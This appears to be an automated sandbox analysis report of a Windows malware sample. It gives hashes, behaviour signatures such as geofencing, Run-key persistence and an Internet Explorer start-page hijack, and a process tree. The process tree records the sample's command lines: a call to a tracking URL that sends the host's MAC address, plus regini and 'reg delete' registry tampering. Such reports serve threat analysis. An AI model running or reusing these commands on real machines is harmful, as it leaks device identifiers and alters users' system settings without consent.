Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30/09/2024, 12:03

General

  • Target

    0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe

  • Size

    192KB

  • MD5

    0135ed6e8402bfffca7678ccb611c700

  • SHA1

    e65fe4fe86c6ca570efeae42aced0c88d5ba8b56

  • SHA256

    d6987124b3688bf43b82c9a28a28f0322f28e4256c323cb296ff8c55e6cec800

  • SHA512

    1ec530d31bb96cf2390413c6a2cacb5e102fc2e54c5d8a895533b0e7382dd72f71a8e244f4597ced243dc1deddf5c5bf37aaa1c6d3b3c03207fb4c152e8bed78

  • SSDEEP

    3072:z/na6WDmrZ5Cn79xvlr2xmOJ5wUuWXcfb0hw7IACb873684yVcx566/znEV/IEeC:z/nuDm9knmhJ4/sMLuO6/zGeEf

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies registry class 41 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0135ed6e8402bfffca7678ccb611c700_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies Internet Explorer start page
    • Modifies registry class
    • NTFS ADS
    • Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://down.biso.cc/b/tj.asp?mac=5E:50:32:4A:DE:FE&tid=0135ed6e8402bfffca7678ccb611c700_JaffaCakes118
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://down.biso.cc/b/tj.asp?mac=5E:50:32:4A:DE:FE&tid=0135ed6e8402bfffca7678ccb611c700_JaffaCakes118
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3320
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3320 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\401127_s.ini
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\SysWOW64\regini.exe
        regini C:\Users\Admin\AppData\Local\Temp\401127_s.ini
        3⤵
        • Modifies registry class
        PID:3568
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2028
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\401127.ini
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2948
      • C:\Windows\SysWOW64\regini.exe
        regini C:\Users\Admin\AppData\Local\Temp\401127.ini
        3⤵
        • Modifies registry class
        PID:2728
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3412
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:220

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    5c93309a2b418ef7de0afb3ae82770c2

    SHA1

    1b9d1a371d163274c3831c764f18ce33f529e5f6

    SHA256

    fa0eff22a494037462bc32f5f477044d28d8e7795b8e2ee7724dbe0c646f2b22

    SHA512

    08d71c4cd9ff5df8c53b83bc24fa1ef42c3c205ed08b3a3d38fbc737a68083241c0230a942336f76d0aeb3bf7ffcdc8b8e4f3f82f9f3eba1c7e47af83802af76

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    9571c5066fd29abb351e98a0e6691cca

    SHA1

    6f03e7c59903e6e147935f708b20466bbc300914

    SHA256

    3f2d29a083bb6be78261af22107c7bfaee7ef30db94c19ad66e6ca72ad74a258

    SHA512

    8be52b82881b90bae863d7051debb6b0ec80bd542745f35569c033f1e242cf89a3c69dadfba3b4090971b89def7fae2a330e4d0c8a054314624b72c7beaa06b2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G40JFEW9\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Temp\401127.ini

    Filesize

    533B

    MD5

    908ba1d0818950d4558329f28a3dacd1

    SHA1

    9f8903bb71af35a3d7bf919f229557a78bec622c

    SHA256

    0e57d2f3cfac1ce0dad7d7f962be88f5664192c37a114f94a87467c33809c68f

    SHA512

    c9816f18ceca1bcffc2af44c0304df4c1f966aad9292f8851fc919e4ece9632ed9f16b4ef88be4d4541f0f628789179af4f4780ae742d53299c70f69c774476b

  • C:\Users\Admin\AppData\Local\Temp\401127_s.ini

    Filesize

    630B

    MD5

    b355e0d19856e816015f605878691487

    SHA1

    56f09703d3909cdae020c1a5907e96e3b986835c

    SHA256

    21c303bb3e578ad6b5c2fba21087c1047217cb89d794b32f989cb283f1caf162

    SHA512

    ab7163fbb4170e51f14541c32511b9628d7cdba43907e7ae7c2ae8b6ffffaa0f6fc2df75fb5a35baf3a01bfae0c3ac895a783d73bd44e0c482d1bd234c3e34b0

  • memory/3472-19-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB